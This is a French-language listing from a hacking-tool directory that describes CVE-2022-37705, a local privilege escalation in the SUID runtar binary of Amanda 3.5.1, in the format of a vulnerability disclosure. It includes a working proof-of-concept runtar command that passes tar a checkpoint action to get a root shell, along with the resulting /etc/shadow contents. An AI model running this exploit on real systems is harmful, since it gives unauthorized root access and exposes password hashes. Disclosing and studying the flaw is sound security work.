Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-37705 — Amanda 3.5.1 second LPE. | Kitploit
Outils/GitHubGitHub/maherazzouzi/cve-2022-37705
Privilege EscalationStatic AnalysisVulnerability AnalysisCode AnalysisExploitationPenetration TestingBinary Exploitation
GitHubmaherazzouzi/cve-2022-37705

CVE-2022-37705

Amanda 3.5.1 second LPE.

Voir le dépôt
31il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

[Description suggérée] Une faille d'élévation de privilèges a été découverte dans Amanda 3.5.1, permettant de passer de l'utilisateur backup aux privilèges root. Le composant vulnérable est le SUID runtar, qui est simplement un wrapper pour exécuter /usr/bin/tar avec des arguments spécifiques contrôlables par l'attaquant. Le programme ne vérifie pas correctement les arguments passés au binaire tar (il suppose que tous les arguments doivent être de la forme --ARG VALEUR mais on peut fournir --ARG=VALUE comme un seul argument).


[Informations supplémentaires] Cette faille peut être utilisée pour l'exécution de code, le déni de service, l'élévation de privilèges et la divulgation d'informations. Voici la preuve de concept (PoC) pour l'exploiter et obtenir un shell root : backup@maher:/lib/amanda$ id uid=34(backup) gid=34(backup) groups=34(backup),6(disk),26(tape)

backup@maher:/lib/amanda$ head /etc/shadow head: cannot open '/etc/shadow' for reading: Permission denied

backup@maher:/lib/amanda$ ./runtar NOCONFIG tar --create --file=/dev/null --checkpoint=1 --directory=. --checkpoint-action=exec=/bin/sh /dev/null tar: Removing leading `/' from member names

head /etc/shadow

root:!:19132:0:99999:7::: daemon::19101:0:99999:7::: bin::19101:0:99999:7::: sys::19101:0:99999:7::: sync::19101:0:99999:7::: games::19101:0:99999:7::: man::19101:0:99999:7::: lp::19101:0:99999:7::: mail::19101:0:99999:7::: news:*:19101:0:99999:7:::


[Autre type de vulnérabilité] Vérification incorrecte des arguments.


[Vendeur du produit] Amanda


[Base de code du produit affecté] runtar - 3.5.1


[Composant affecté] Le binaire SUID affecté est : runtar Le fichier affecté est : runtar.c Les lignes de code affectées commencent à la ligne 162.


[Type d'attaque] Locale


[Impact Exécution de code] true


[Impact Déni de service] true


[Impact Élévation de privilèges] true


[Impact Divulgation d'informations] true


[Vecteurs d'attaque] Pour exploiter le binaire, il suffit de fournir des arguments spécialement conçus au binaire SUID runtar pour escalader vers root.


[Référence] http://www.amanda.org/


[Découvreur] Maher Azzouzi

Utilisez CVE-2022-37705.

Télécharger l’outil